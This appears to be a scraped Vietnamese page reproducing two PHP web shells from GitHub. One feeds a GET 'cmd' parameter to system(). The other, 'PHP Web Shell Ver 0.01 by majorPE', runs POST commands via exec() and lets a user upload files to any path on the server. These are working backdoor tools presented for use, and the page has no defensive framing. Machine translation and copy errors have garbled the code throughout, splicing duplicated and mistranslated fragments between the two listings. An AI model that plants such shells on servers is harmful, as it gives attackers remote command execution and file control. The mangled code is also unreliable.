Hướng dẫn php shell github - php shell github

Tệp này chứa văn bản unicode hai chiều có thể được giải thích hoặc biên dịch khác với những gì xuất hiện dưới đây.Để xem xét, hãy mở tệp trong một trình soạn thảo cho thấy các ký tự Unicode ẩn.Tìm hiểu thêm về các ký tự unicode hai chiều

<html>
<body>
<form method="GET" name=" echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
form>
<pre>
if (isset ($ _ get ['cmd'])))(isset($_GET['cmd']))
{
hệ thống ($ _ get ['cmd']);$_GET['cmd']);
}
?>
pre>
body>
html>

Tệp này chứa văn bản unicode hai chiều có thể được giải thích hoặc biên dịch khác với những gì xuất hiện dưới đây.Để xem xét, hãy mở tệp trong một trình soạn thảo cho thấy các ký tự Unicode ẩn.Tìm hiểu thêm về các ký tự unicode hai chiều

>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="euc-kr">
if (isset ($ _ get ['cmd'])))title>PHP Web Shell Ver 0.01 by majorPEtitle>
<script type="text/javascript">
functionFocusIn(obj) FocusIn(obj)
{
if(obj.value==obj.defaultValue)(obj.value == obj.defaultValue)
obj.value='';.value = '';
hệ thống ($ _ get ['cmd']);
functionFocusOut(obj) FocusOut(obj)
{
if(obj.value=='')(obj.value == '')
obj.value=obj.defaultValue;.value = obj.defaultValue;
hệ thống ($ _ get ['cmd']);
script>
head>
<body>
}b>WebShell's Location = http:// echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>b><br><br>
?> echo $_SERVER['HTTP_HOST'] ?><br>
Php Web Shell Ver 0,01 bởi Majorpe echo $_SERVER['REQUEST_URI'] ?><br>
<br>
<form name="cmd_exec" method="post" action="http:// echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)">
<input type="submit" name="exec" value="exec">
form>
{(isset($_POST['exec']))
}
Vị trí của WebShell = http: //$_POST['cmd'],$result);
Http_host = '----------------- < OutPut > -----------------';
Request_uri = '
';
if (isset ($ _ post ['exec'])))($result as $print)
{
exec ($ _ post ['cmd'], $ result);print = str_replace('<','<',$print);
echo $print . '
'
;
}
Request_uri = '';
}
?> echo '
'
;
?>
<form enctype="multipart/form-data" name="file_upload" method="post" action="http:// echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
<input type="file" name="file">
<input type="submit" name="upload" value="upload"><br>
<input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)">
form>
Php Web Shell Ver 0,01 bởi Majorpe(isset($_POST['upload']))
}
Vị trí của WebShell = http: //check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
Http_host =($check == TRUE)
Request_uri = '
The file was uploaded successfully!!
'
;
else
if (isset ($ _ post ['exec']))) '
File Upload was failed...
'
;
}
?>
body>
html>